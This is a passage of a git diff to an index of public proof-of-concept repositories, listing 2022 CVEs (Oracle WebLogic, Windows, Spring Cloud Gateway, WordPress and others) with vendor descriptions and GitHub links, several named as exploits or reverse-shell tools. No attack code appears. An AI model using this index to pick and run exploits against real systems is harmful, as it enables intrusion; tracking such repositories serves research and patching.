are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371) +- [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371) +- [Cappricio-Securities/CVE-2022-21371](https://github.com/Cappricio-Securities/CVE-2022-21371) + +### CVE-2022-21392 (2022-01-19) + +Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Policy Framework). Supported versions that are affected are 13.4.0.0 and 13.5.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Enterprise Manager Base Platform accessible data. CVSS 3.1 Base Score 8.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [mbadanoiu/CVE-2022-21392](https://github.com/mbadanoiu/CVE-2022-21392) + +### CVE-2022-21445 (2022-04-19) + +Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in takeover of Oracle Application Development Framework (ADF). Note: Oracle Application Development Framework (ADF) is downloaded via Oracle JDeveloper Product. Please refer to Fusion Middleware Patch Advisor for more details. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-21445-for-12.2.1.3.0-Weblogic) + ### CVE-2022-21449 (2022-04-19) Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). @@ -329,6 +17989,41 @@ - [thack1/CVE-2022-21449](https://github.com/thack1/CVE-2022-21449) - [Damok82/SignChecker](https://github.com/Damok82/SignChecker) - [fundaergn/CVE-2022-21449](https://github.com/fundaergn/CVE-2022-21449) +- [Skipper7718/CVE-2022-21449-showcase](https://github.com/Skipper7718/CVE-2022-21449-showcase) +- [davwwwx/CVE-2022-21449](https://github.com/davwwwx/CVE-2022-21449) +- [AlexanderZinoni/CVE-2022-21449](https://github.com/AlexanderZinoni/CVE-2022-21449) +- [HeyMrSalt/AIS3-2024-Project-D5Team](https://github.com/HeyMrSalt/AIS3-2024-Project-D5Team) + +### CVE-2022-21500 (2022-05-19) + +Vulnerability in Oracle E-Business Suite (component: Manage Proxies). The supported version that is affected is 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered. <br> <br>Oracle E-Business Suite 12.1 is not impacted by this vulnerability. Customers should refer to the Patch Availability Document for details. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [Cappricio-Securities/CVE-2022-21500](https://github.com/Cappricio-Securities/CVE-2022-21500) + +### CVE-2022-21587 (2022-10-18) + +Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [hieuminhnv/CVE-2022-21587-POC](https://github.com/hieuminhnv/CVE-2022-21587-POC) +- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit) +- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-) + +### CVE-2022-21658 (2022-01-20) + +Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions. + + +- [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658) + +### CVE-2022-21660 (2022-02-09) + +Gin-vue-admin is a backstage management system based on vue and gin. In versions prior to 2.4.7 low privilege users are able to modify higher privilege users. Authentication is missing on the `setUserInfo` function. Users are advised to update as soon as possible. There are no known workarounds. + + +- [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660) +- [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660) ### CVE-2022-21661 (2022-01-06) @@ -336,7 +18031,25 @@ - [TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection](https://github.com/TAPESH-TEAM/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection) +- [purple-WL/wordpress-CVE-2022-21661](https://github.com/purple-WL/wordpress-CVE-2022-21661) - [0x4E0x650x6F/Wordpress-cve-CVE-2022-21661](https://github.com/0x4E0x650x6F/Wordpress-cve-CVE-2022-21661) +- [z92g/CVE-2022-21661](https://github.com/z92g/CVE-2022-21661) +- [guestzz/CVE-2022-21661](https://github.com/guestzz/CVE-2022-21661) +- [safe3s/CVE-2022-21661](https://github.com/safe3s/CVE-2022-21661) +- [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661) +- [daniel616/CVE-2022-21661-Demo](https://github.com/daniel616/CVE-2022-21661-Demo) +- [sealldeveloper/CVE-2022-21661-PoC](https://github.com/sealldeveloper/CVE-2022-21661-PoC) +- [p4ncontomat3/CVE-2022-21661](https://github.com/p4ncontomat3/CVE-2022-21661) +- [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661) +- [w0r1i0g1ht/CVE-2022-21661](https://github.com/w0r1i0g1ht/CVE-2022-21661) +- [kittypurrnaz/cve-2022-21661](https://github.com/kittypurrnaz/cve-2022-21661) + +### CVE-2022-21668 (2022-01-10) + +pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability. + + +- [sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability](https://github.com/sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability) ### CVE-2022-21728 (2022-02-03) @@ -352,24 +18065,95 @@ - [docfate111/CVE-2022-21789](https://github.com/docfate111/CVE-2022-21789) +### CVE-2022-21839 (2022-01-11) + +Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability + + +- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-) + +### CVE-2022-21877 (2022-01-11) + +Storage Spaces Controller Information Disclosure Vulnerability + + +- [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877) + +### CVE-2022-21881 (2022-01-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [theabysslabs/CVE-2022-21881](https://github.com/theabysslabs/CVE-2022-21881) + +### CVE-2022-21882 (2022-01-11) + +Win32k Elevation of Privilege Vulnerability + + +- [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882) +- [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882) +- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882) +- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc) +- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882) +- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882) + +### CVE-2022-21894 (2022-01-11) + +Secure Boot Security Feature Bypass Vulnerability + + +- [Wack0/CVE-2022-21894](https://github.com/Wack0/CVE-2022-21894) +- [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload) +- [Wack0/batondrop_armv7](https://github.com/Wack0/batondrop_armv7) +- [bakedmuffinman/BlackLotusDetection](https://github.com/bakedmuffinman/BlackLotusDetection) +- [qjawls2003/BlackLotus-Detection](https://github.com/qjawls2003/BlackLotus-Detection) +- [nova-master/CVE-2022-21894-Payload-New](https://github.com/nova-master/CVE-2022-21894-Payload-New) + ### CVE-2022-21907 (2022-01-11) HTTP Protocol Stack Remote Code Execution Vulnerability - [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907) +- [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907) +- [ZZ-SOCMAP/CVE-2022-21907](https://github.com/ZZ-SOCMAP/CVE-2022-21907) +- [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907) - [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys) +- [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC) - [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907) - [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907) - [iveresk/cve-2022-21907-http.sys](https://github.com/iveresk/cve-2022-21907-http.sys) - [iveresk/cve-2022-21907](https://github.com/iveresk/cve-2022-21907) +- [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907) +- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher) +- [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907) +- [EzoomE/CVE-2022-21907-RCE](https://github.com/EzoomE/CVE-2022-21907-RCE) +- [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907) +- [kamal-marouane/CVE-2022-21907](https://github.com/kamal-marouane/CVE-2022-21907) + +### CVE-2022-21970 (2022-01-11) + +Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability + + +- [Malwareman007/CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970) ### CVE-2022-21971 (2022-02-09) Windows Runtime Remote Code Execution Vulnerability +- [0vercl0k/CVE-2022-21971](https://github.com/0vercl0k/CVE-2022-21971) - [tufanturhan/CVE-2022-21971-Windows-Runtime-RCE](https://github.com/tufanturhan/CVE-2022-21971-Windows-Runtime-RCE) +- [Malwareman007/CVE-2022-21971](https://github.com/Malwareman007/CVE-2022-21971) + +### CVE-2022-21974 (2022-02-09) + +Roaming Security Rights Management Services Remote Code Execution Vulnerability + + +- [0vercl0k/CVE-2022-21974](https://github.com/0vercl0k/CVE-2022-21974) ### CVE-2022-21984 (2022-02-09) @@ -378,12 +18162,94 @@ - [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984) +### CVE-2022-21999 (2022-02-09) + +Windows Print Spooler Elevation of Privilege Vulnerability + + +- [ly4k/SpoolFool](https://github.com/ly4k/SpoolFool) + +### CVE-2022-22029 (2022-07-12) + +Windows Network File System Remote Code Execution Vulnerability + + +- [mchoudhary15/CVE-2022-22029-NFS-Server-](https://github.com/mchoudhary15/CVE-2022-22029-NFS-Server-) + +### CVE-2022-22057 (2022-06-14) + +Use after free in graphics fence due to a race condition while closing fence file descriptor and destroy graphics timeline simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables + + +- [diabl0w/CVE-2022-22057_SM-F926U](https://github.com/diabl0w/CVE-2022-22057_SM-F926U) + +### CVE-2022-22063 (2022-12-14) + +Memory corruption in Core due to improper configuration in boot remapper. + + +- [msm8916-mainline/CVE-2022-22063](https://github.com/msm8916-mainline/CVE-2022-22063) + +### CVE-2022-22274 (2022-03-25) + +A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall. + + +- [4lucardSec/Sonic_CVE-2022-22274_poc](https://github.com/4lucardSec/Sonic_CVE-2022-22274_poc) +- [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc) +- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656) + +### CVE-2022-22296 (2022-01-24) + +Sourcecodester Hospital's Patient Records Management System 1.0 is vulnerable to Insecure Permissions via the id parameter in manage_user endpoint. Simply change the value and data of other users can be displayed. + + +- [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296) + +### CVE-2022-22536 (2022-02-09) + +SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n + + +- [ZZ-SOCMAP/CVE-2022-22536](https://github.com/ZZ-SOCMAP/CVE-2022-22536) +- [tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536](https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536) + +### CVE-2022-22555 (2022-07-20) + +Dell EMC PowerStore, contains an OS command injection Vulnerability. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege. + + +- [colaoo123/cve-2022-22555](https://github.com/colaoo123/cve-2022-22555) + +### CVE-2022-22582 (2023-02-27) + +A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files. + + +- [poizon-box/CVE-2022-22582](https://github.com/poizon-box/CVE-2022-22582) + +### CVE-2022-22600 (2022-03-18) + +The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. + + +- [KlinKlinKlin/MSF-screenrecord-on-MacOS](https://github.com/KlinKlinKlin/MSF-screenrecord-on-MacOS) + ### CVE-2022-22620 (2022-03-18) A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. - [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620) +- [springsec/CVE-2022-22620](https://github.com/springsec/CVE-2022-22620) +- [bb33bb/dkjiayu.github.io](https://github.com/bb33bb/dkjiayu.github.io) + +### CVE-2022-22629 (2022-09-23) + +A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. + + +- [lck0/CVE-2022-22629](https://github.com/lck0/CVE-2022-22629) ### CVE-2022-22639 (2022-03-18) @@ -399,6 +18265,20 @@ - [ahmetfurkans/CVE-2022-22718](https://github.com/ahmetfurkans/CVE-2022-22718) +### CVE-2022-22720 (2022-03-14) + +Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling + + +- [Benasin/CVE-2022-22720](https://github.com/Benasin/CVE-2022-22720) + +### CVE-2022-22733 (2022-01-20) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + + +- [Zeyad-Azima/CVE-2022-22733](https://github.com/Zeyad-Azima/CVE-2022-22733) + ### CVE-2022-22814 (2022-03-10) The System Diagnosis service of MyASUS before 3.1.2.0 allows privilege escalation. @@ -406,6 +18286,13 @@ - [DShankle/CVE-2022-22814_PoC](https://github.com/DShankle/CVE-2022-22814_PoC) +### CVE-2022-22818 (2022-02-03) + +The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. This may lead to XSS. + + +- [Prikalel/django-xss-example](https://github.com/Prikalel/django-xss-example) + ### CVE-2022-22822 (2022-01-08) addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. @@ -413,12 +18300,56 @@ - [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827) +### CVE-2022-22828 (2022-01-27) + +An insecure direct object reference for the file-download URL in Synametrics SynaMan before 5.0 allows a remote attacker to access unshared files via a modified base64-encoded filename string. + + +- [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828) + +### CVE-2022-22845 (2022-01-09) + +QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations. + + +- [OmriBaso/CVE-2022-22845-Exploit](https://github.com/OmriBaso/CVE-2022-22845-Exploit) + +### CVE-2022-22850 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_types. + + +- [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850) + +### CVE-2022-22851 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php + + +- [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851) + +### CVE-2022-22852 (2022-01-26) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the description parameter in room_list. + + +- [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852) + +### CVE-2022-22885 (2022-02-16) + +Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation. + + +- [miguelc49/CVE-2022-22885-2](https://github.com/miguelc49/CVE-2022-22885-2) +- [miguelc49/CVE-2022-22885-1](https://github.com/miguelc49/CVE-2022-22885-1) + ### CVE-2022-22909 (2022-03-02) HotelDruid v3.0.3 was discovered to contain a remote code execution (RCE) vulnerability which is exploited via an attacker inserting a crafted payload into the name field under the Create New Room module. - [0z09e/CVE-2022-22909](https://github.com/0z09e/CVE-2022-22909) +- [kaal18/CVE-2022-22909](https://github.com/kaal18/CVE-2022-22909) ### CVE-2022-22916 (2022-02-17) @@ -432,9 +18363,44 @@ In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. +- [lucksec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947) +- [scopion/cve-2022-22947](https://github.com/scopion/cve-2022-22947) +- [Vulnmachines/spring-cve-2022-22947](https://github.com/Vulnmachines/spring-cve-2022-22947) - [Axx8/CVE-2022-22947_Rce_Exp](https://github.com/Axx8/CVE-2022-22947_Rce_Exp) +- [crowsec-edtech/CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947) +- [Tas9er/SpringCloudGatewayRCE](https://github.com/Tas9er/SpringCloudGatewayRCE) +- [Greetdawn/CVE-2022-22947](https://github.com/Greetdawn/CVE-2022-22947) +- [Summer177/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/Summer177/Spring-Cloud-Gateway-CVE-2022-22947) +- [BerMalBerIst/CVE-2022-22947](https://github.com/BerMalBerIst/CVE-2022-22947) +- [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway) +- [dingxiao77/-cve-2022-22947-](https://github.com/dingxiao77/-cve-2022-22947-) +- [flying0er/CVE-2022-22947-goby](https://github.com/flying0er/CVE-2022-22947-goby) +- [dbgee/CVE-2022-22947](https://github.com/dbgee/CVE-2022-22947) +- [nu0l/cve-2022-22947](https://github.com/nu0l/cve-2022-22947) +- [nanaao/CVE-2022-22947-POC](https://github.com/nanaao/CVE-2022-22947-POC) +- [hunzi0/CVE-2022-22947-Rce_POC](https://github.com/hunzi0/CVE-2022-22947-Rce_POC) +- [22ke/CVE-2022-22947](https://github.com/22ke/CVE-2022-22947) +- [M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE](https://github.com/M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE) +- [YutuSec/SpEL](https://github.com/YutuSec/SpEL) +- [Jun-5heng/CVE-2022-22947](https://github.com/Jun-5heng/CVE-2022-22947) +- [darkb1rd/cve-2022-22947](https://github.com/darkb1rd/cve-2022-22947) +- [mrknow001/CVE-2022-22947](https://github.com/mrknow001/CVE-2022-22947) +- [0x7eTeam/CVE-2022-22947](https://github.com/0x7eTeam/CVE-2022-22947) +- [ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code](https://github.com/ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code) +- [Arrnitage/CVE-2022-22947_exp](https://github.com/Arrnitage/CVE-2022-22947_exp) +- [PaoPaoLong-lab/Spring-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-CVE-2022-22947-) +- [hh-hunter/cve-2022-22947-docker](https://github.com/hh-hunter/cve-2022-22947-docker) - [k3rwin/spring-cloud-gateway-rce](https://github.com/k3rwin/spring-cloud-gateway-rce) +- [bysinks/CVE-2022-22947](https://github.com/bysinks/CVE-2022-22947) +- [Wrin9/CVE-2022-22947](https://github.com/Wrin9/CVE-2022-22947) +- [viemsr/spring_cloud_gateway_memshell](https://github.com/viemsr/spring_cloud_gateway_memshell) - [Enokiy/cve-2022-22947-spring-cloud-gateway](https://github.com/Enokiy/cve-2022-22947-spring-cloud-gateway) +- [Nathaniel1025/CVE-2022-22947](https://github.com/Nathaniel1025/CVE-2022-22947) +- [Vancomycin-g/CVE-2022-22947](https://github.com/Vancomycin-g/CVE-2022-22947) +- [scopion/CVE-2022-22947-exp](https://github.com/scopion/CVE-2022-22947-exp) +- [sagaryadav8742/springcloudRCE](https://github.com/sagaryadav8742/springcloudRCE) +- [fbion/CVE-2022-22947](https://github.com/fbion/CVE-2022-22947) +- [talentsec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/talentsec/Spring-Cloud-Gateway-CVE-2022-22947) - [aesm1p/CVE-2022-22947-POC-Reproduce](https://github.com/aesm1p/CVE-2022-22947-POC-Reproduce) - [4nNns/CVE-2022-22947](https://github.com/4nNns/CVE-2022-22947) - [expzhizhuo/Burp_VulPscan](https://github.com/expzhizhuo/Burp_VulPscan) @@ -445,6 +18411,14 @@ - [Wrong-pixel/CVE-2022-22947-exp](https://github.com/Wrong-pixel/CVE-2022-22947-exp) - [stayfoolish777/CVE-2022-22947-POC](https://github.com/stayfoolish777/CVE-2022-22947-POC) - [B0rn2d/Spring-Cloud-Gateway-Nacos](https://github.com/B0rn2d/Spring-Cloud-Gateway-Nacos) +- [kmahyyg/CVE-2022-22947](https://github.com/kmahyyg/CVE-2022-22947) +- [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947) +- [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947) +- [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947) +- [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947) +- [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947) +- [Sumitpathania03/CVE-2022-22947](https://github.com/Sumitpathania03/CVE-2022-22947) +- [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947) ### CVE-2022-22948 (2022-03-29) @@ -481,6 +18455,9 @@ - [orwagodfather/CVE-2022-22954](https://github.com/orwagodfather/CVE-2022-22954) - [b4dboy17/CVE-2022-22954](https://github.com/b4dboy17/CVE-2022-22954) - [arzuozkan/CVE-2022-22954](https://github.com/arzuozkan/CVE-2022-22954) +- [amit-pathak009/CVE-2022-22954](https://github.com/amit-pathak009/CVE-2022-22954) +- [amit-pathak009/CVE-2022-22954-PoC](https://github.com/amit-pathak009/CVE-2022-22954-PoC) +- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller) ### CVE-2022-22963 (2022-04-01) @@ -488,10 +18465,33 @@ - [hktalent/spring-spel-0day-poc](https://github.com/hktalent/spring-spel-0day-poc) +- [dinosn/CVE-2022-22963](https://github.com/dinosn/CVE-2022-22963) +- [RanDengShiFu/CVE-2022-22963](https://github.com/RanDengShiFu/CVE-2022-22963) - [darryk10/CVE-2022-22963](https://github.com/darryk10/CVE-2022-22963) +- [Kirill89/CVE-2022-22963-PoC](https://github.com/Kirill89/CVE-2022-22963-PoC) +- [stevemats/Spring0DayCoreExploit](https://github.com/stevemats/Spring0DayCoreExploit) +- [puckiestyle/CVE-2022-22963](https://github.com/puckiestyle/CVE-2022-22963) +- [me2nuk/CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963) +- [kh4sh3i/Spring-CVE](https://github.com/kh4sh3i/Spring-CVE) +- [AayushmanThapaMagar/CVE-2022-22963](https://github.com/AayushmanThapaMagar/CVE-2022-22963) +- [twseptian/cve-2022-22963](https://github.com/twseptian/cve-2022-22963) - [SealPaPaPa/SpringCloudFunction-Research](https://github.com/SealPaPaPa/SpringCloudFunction-Research) - [G01d3nW01f/CVE-2022-22963](https://github.com/G01d3nW01f/CVE-2022-22963) - [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce) +- [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963) +- [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963) +- [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC) +- [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963) +- [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC) +- [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit) +- [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963) +- [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit) +- 